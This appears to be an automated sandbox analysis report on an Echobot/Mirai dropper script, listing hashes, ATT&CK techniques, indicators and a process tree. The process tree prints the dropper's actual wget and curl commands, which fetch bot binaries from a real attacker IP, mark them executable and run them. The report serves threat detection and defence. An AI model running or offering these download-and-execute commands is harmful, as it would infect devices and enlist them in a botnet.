echobot | 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd

Analysis

max time kernel
151s
max time network
155s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
22-11-2024 18:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8UsA.sh
Size

1KB
MD5

513641f5f60d55559c2060489de6d605
SHA1

c95feec2255732b60d434b0639b88a5cff205ea0
SHA256

1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
SHA512

71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0

Score

10^/10

echobot mirai botnet defense_evasion discovery trojan

Malware Config

Signatures

Detected Echobot 2 IoCs

Processes:

resource	yara_rule
/tmp/UnHAnaAW.x86	family_echobot
/tmp/3AvA	family_echobot

Echobot
An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.
botnet trojan echobot
Echobot family
echobot
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (149409) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmod

pid process

756 chmod
812 chmod
828 chmod
722 chmod
728 chmod
Executes dropped EXE 5 IoCs

Processes:

3AvA3AvA3AvA3AvA3AvA

ioc pid process

/tmp/3AvA 723 3AvA
/tmp/3AvA 729 3AvA
/tmp/3AvA 757 3AvA
/tmp/3AvA 813 3AvA
/tmp/3AvA 829 3AvA

pid	process
756	chmod
812	chmod
828	chmod
722	chmod
728	chmod

ioc	pid	process
/tmp/3AvA	723	3AvA
/tmp/3AvA	729	3AvA
/tmp/3AvA	757	3AvA
/tmp/3AvA	813	3AvA
/tmp/3AvA	829	3AvA

Modifies Watchdog functionality 1 TTPs 8 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

Processes:

3AvA3AvA3AvA3AvA

description	ioc	process
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA

Enumerates active TCP sockets 1 TTPs 4 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

Processes:

3AvA3AvA3AvA3AvA

description	ioc	process
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 4 IoCs

Processes:

3AvA3AvA3AvA3AvA

description	ioc	pid	process
Changes the process name, possibly in an attempt to hide itself	c3j15pmc1d0ej4cbg52	729	3AvA
Changes the process name, possibly in an attempt to hide itself	fgik5d2i4ojdbg0	757	3AvA
Changes the process name, possibly in an attempt to hide itself	h451em3akb3ehak414h	813	3AvA
Changes the process name, possibly in an attempt to hide itself	25kk5od1001b	829	3AvA

Reads system network configuration 1 TTPs 4 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

Processes:

3AvA3AvA3AvA3AvA

description	ioc	process
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

3AvA3AvA3AvA3AvAcurlcurlcurl

description	ioc	process
File opened for reading	/proc/374/fd	3AvA
File opened for reading	/proc/138/fd	3AvA
File opened for reading	/proc/663/fd	3AvA
File opened for reading	/proc/664/fd	3AvA
File opened for reading	/proc/665/fd	3AvA
File opened for reading	/proc/785/fd	3AvA
File opened for reading	/proc/799/fd	3AvA
File opened for reading	/proc/740/exe	3AvA
File opened for reading	/proc/836/exe	3AvA
File opened for reading	/proc/665/exe	3AvA
File opened for reading	/proc/748/exe	3AvA
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/383/fd	3AvA
File opened for reading	/proc/400/fd	3AvA
File opened for reading	/proc/685/fd	3AvA
File opened for reading	/proc/357/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/356/fd	3AvA
File opened for reading	/proc/164/fd	3AvA
File opened for reading	/proc/319/fd	3AvA
File opened for reading	/proc/814/exe	3AvA
File opened for reading	/proc/664/fd	3AvA
File opened for reading	/proc/138/fd	3AvA
File opened for reading	/proc/319/fd	3AvA
File opened for reading	/proc/814/fd	3AvA
File opened for reading	/proc/374/fd	3AvA
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/372/fd	3AvA
File opened for reading	/proc/400/fd	3AvA
File opened for reading	/proc/228/fd	3AvA
File opened for reading	/proc/383/fd	3AvA
File opened for reading	/proc/228/fd	3AvA
File opened for reading	/proc/663/exe	3AvA
File opened for reading	/proc/689/exe	3AvA
File opened for reading	/proc/655/exe	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/325/fd	3AvA
File opened for reading	/proc/693/fd	3AvA
File opened for reading	/proc/787/fd	3AvA
File opened for reading	/proc/820/exe	3AvA
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/400/fd	3AvA
File opened for reading	/proc/736/exe	3AvA
File opened for reading	/proc/768/fd	3AvA
File opened for reading	/proc/663/fd	3AvA
File opened for reading	/proc/690/exe	3AvA
File opened for reading	/proc/164/fd	3AvA
File opened for reading	/proc/730/exe	3AvA
File opened for reading	/proc/321/fd	3AvA
File opened for reading	/proc/357/fd	3AvA
File opened for reading	/proc/325/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/357/fd	3AvA
File opened for reading	/proc/372/fd	3AvA
File opened for reading	/proc/664/exe	3AvA
File opened for reading	/proc/787/exe	3AvA
File opened for reading	/proc/768/fd	3AvA
File opened for reading	/proc/785/fd	3AvA
File opened for reading	/proc/693/fd	3AvA
File opened for reading	/proc/319/fd	3AvA
File opened for reading	/proc/693/exe	3AvA
File opened for reading	/proc/372/fd	3AvA
File opened for reading	/proc/698/fd	3AvA
File opened for reading	/proc/228/fd	3AvA

System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

3AvAwgetcurlcat

pid process

729 3AvA
725 wget
726 curl
727 cat

pid	process
729	3AvA
725	wget
726	curl
727	cat

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetwgetwgetcurlwgetcurlcurlcurlwget8UsA.shcurl

description	ioc	process
File opened for modification	/tmp/UnHAnaAW.mips	wget
File opened for modification	/tmp/UnHAnaAW.arm5	wget
File opened for modification	/tmp/UnHAnaAW.x86	wget
File opened for modification	/tmp/UnHAnaAW.x86	curl
File opened for modification	/tmp/UnHAnaAW.mpsl	wget
File opened for modification	/tmp/UnHAnaAW.mpsl	curl
File opened for modification	/tmp/UnHAnaAW.arm4	curl
File opened for modification	/tmp/UnHAnaAW.arm5	curl
File opened for modification	/tmp/UnHAnaAW.arm6	wget
File opened for modification	/tmp/3AvA	8UsA.sh
File opened for modification	/tmp/UnHAnaAW.mips	curl

/tmp/8UsA.sh
/tmp/8UsA.sh
1⤵
- Writes file to tmp directory
PID:693
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.x86
  2⤵
  - Writes file to tmp directory
  PID:699
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.x86
  2⤵
  - Writes file to tmp directory
  PID:713
- /bin/cat
  cat UnHAnaAW.x86
  2⤵
  PID:721
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-YDKfVW UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:722
- /tmp/3AvA
  ./3AvA x86
  2⤵
  - Executes dropped EXE
  PID:723
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:725
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:726
- /bin/cat
  cat UnHAnaAW.mips
  2⤵
  - System Network Configuration Discovery
  PID:727
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-YDKfVW UnHAnaAW.mips UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:728
- /tmp/3AvA
  ./3AvA mips
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:729
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.mpsl
  2⤵
  - Writes file to tmp directory
  PID:739
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:740
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:756
- /tmp/3AvA
  ./3AvA mpsl
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:757
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.arm4
  2⤵
  PID:792
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.arm4
  2⤵
  - Writes file to tmp directory
  PID:802
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/3AvA
  ./3AvA arm4
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:813
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.arm5
  2⤵
  - Writes file to tmp directory
  PID:823
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:824
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:828
- /tmp/3AvA
  ./3AvA arm5
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:829
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.arm6
  2⤵
  - Writes file to tmp directory
  PID:839
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.arm6
  2⤵
  PID:840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/3AvA

Filesize
98KB

MD5
1bfd79e3eb8d1d5806b78c2ee800ccbe

SHA1
8c7d5fb0ffe8c51e83cfe644a961d3b2bedb5e83

SHA256
186fc8b8165ee76f730ea3b840c59473597282c472529c9b2716baab011787da

SHA512
ade41301de6fdcbd940dd4a2cd7634ffd13dfb4f24c7b2e9b3e25aae7d3a7b1dce4817eada98e628d591cf8fcd1106d5292bee05ba3bcd6b6cc502135409bc0b

Download Submit
/tmp/UnHAnaAW.x86

Filesize
69KB

MD5
4a5306ed50853b2ce31d13763bde2cd3

SHA1
12a84067a5b8ff314e005365faadd34d47ce0619

SHA256
81d46cb68a82a4f80f26f017a9e988acd67811fb5b461df2546a23ccc5f6a05d

SHA512
b9732bdbe82f34591e5e21b45f80fa7f465932aa6a6f07fd3389a866b0a94b39bd59d4f298fdd896e9b9a601bd4d72494338b1a5817d558ba3b6d2ed1d43e081

Download Submit